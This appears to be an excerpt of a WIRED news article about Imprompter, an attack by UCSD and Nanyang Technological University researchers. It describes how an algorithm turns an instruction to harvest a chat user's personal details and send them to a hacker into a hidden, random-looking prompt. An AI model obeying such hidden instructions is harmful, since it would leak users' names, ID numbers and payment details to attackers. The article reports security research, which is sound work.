Goto

Collaborating Authors

 identify and extract personal detail


This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

WIRED

When talking with a chatbot, you might inevitably give up your personal information--your name, for instance, and maybe details about where you live and work, or your interests. The more you share with a large language model, the greater the risk of it being abused if there's a security flaw. A group of security researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore are now revealing a new attack that secretly commands an LLM to gather your personal information--including names, ID numbers, payment card details, email addresses, mailing addresses, and more--from chats and send it directly to a hacker. The attack, named Imprompter by the researchers, uses an algorithm to transform a prompt given to the LLM into a hidden set of malicious instructions. An English-language sentence telling the LLM to find personal information someone has entered and send it to the hackers is turned into what appears to be a random selection of characters.